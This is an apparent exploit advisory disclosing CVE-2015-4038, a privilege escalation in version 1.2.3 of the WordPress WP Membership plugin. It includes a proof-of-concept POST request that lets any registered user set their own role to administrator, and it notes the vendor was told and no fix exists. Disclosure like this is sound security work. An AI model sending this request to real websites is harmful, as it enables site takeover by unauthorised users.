WordPress WP Membership plugin version 1.2.3 suffers from a privilege escalation vulnerability.
e61bf669773c2f5f27ac77cb45ed738f2bf04021b88a306527b0fb6085f0a6e2
# Exploit Title: WordPress WP Membership plugin [Privilege escalation]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4038
1 Description
Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action.
Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website.
2 Proof of Concept
* Login as regular user
* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`
3 Actions taken after discovery
Vendor was informed on 2015/05/19.
4 Solution
No official solution yet exists.